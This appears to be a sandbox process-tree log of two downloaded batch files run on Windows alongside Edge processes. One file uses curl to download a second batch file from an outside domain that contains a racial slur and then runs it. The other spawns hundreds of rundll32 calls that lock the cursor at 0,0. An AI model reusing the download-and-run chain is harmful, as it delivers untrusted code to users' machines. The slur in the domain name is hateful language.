C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:82⤵PID:8468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\droplnk.bat" "2⤵PID:5224
-
C:\Windows\system32\curl.execurl -o "C:\Users\Admin\AppData\Local\Temp\lnk.bat" "https://dirtyniggers.forsale/lnk.bat"3⤵PID:3628
-
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\lnk.bat"3⤵PID:4244
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:12⤵PID:9312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9224 /prefetch:12⤵PID:9468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=8872 /prefetch:82⤵PID:9688
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6360 /prefetch:12⤵PID:9864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:12⤵PID:9872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9256 /prefetch:12⤵PID:10016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:12⤵PID:1828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,11612329499108546862,5682083605582915955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6576 /prefetch:82⤵PID:6128
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ML.bat" "2⤵PID:9536
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8212
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9608
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9632
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9644
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4556
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1480
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5232
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9732
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9764
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9756
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9780
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9800
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9816
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9832
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9852
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9760
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9804
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10028
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10048
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10068
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10080
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9924
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9928
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9948
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9964
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10008
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10172
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9652
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10212
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10192
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2032
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1332
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6288
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6104
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3480
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5908
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1148
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4244
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9268
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9292
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8296
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8640
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9408
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2116
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9448
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9452
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8828
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8384
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3096
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4208
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8764
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2804
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9084
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1424
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8796
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3656
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9240
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9332
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9500
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8304
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9508
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8616
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3624
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5572
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8440
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2656
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:340
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9124
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2092
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9540
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9556
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9572
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1900
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:404
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9636
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9624
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9640
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:7064
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5548
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5160
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6012
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9772
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9744
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9788
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9800
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9816
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9832
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9852
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9760
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9804
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10028
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10048
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10068
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10080
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9880
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9932
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9952
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9972
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9912
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10168
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2264
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10204
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10224
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10236
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6340
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4900
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3192
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3236
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1704
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9264
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9276
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4304
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9280
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5440
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9424
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9396
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8980
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9444
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9428
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5352
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8904
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:392
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2296
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6020
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1472
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1576
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4172
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8256
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1896
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8388
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8304
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9164
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9020
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6084
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6608
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9304
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8300
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6128
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9532
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9548
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9568
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3040
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4992
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9628
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9620
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9648
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9600
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3628
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:7064
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5548
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5160
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6012
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9772
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9744
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9780
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9828
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9836
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9740
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9724
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10024
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10040
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10056
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10076
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10160
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8512
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9924
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9928
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9948
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9964
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10008
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10172
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9652
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10212
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10192
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:7180
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10184
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4424
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8984
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9284
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9272
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4344
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1832
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8784
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9416
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9400
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9392
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8688
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8980
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9444
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9428
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5352
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8904
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3096
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4208
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8764
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8944
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9084
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1424
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8796
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3656
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9240
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2664
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3700
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6992
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8616
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1008
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:7784
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9512
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9308
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4840
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9524
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4276
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9544
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9560
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9504
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4880
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8212
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9608
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9632
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9644
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3120
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2008
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5232
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9776
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9728
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9784
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9796
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9820
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9840
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9748
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9860
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9856
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10036
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10052
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10064
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10084
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9904
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9916
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9956
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9968
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9872
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10176
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10216
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10200
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10220
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9220
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8972
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1332
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3284
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8720
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3480
-
-
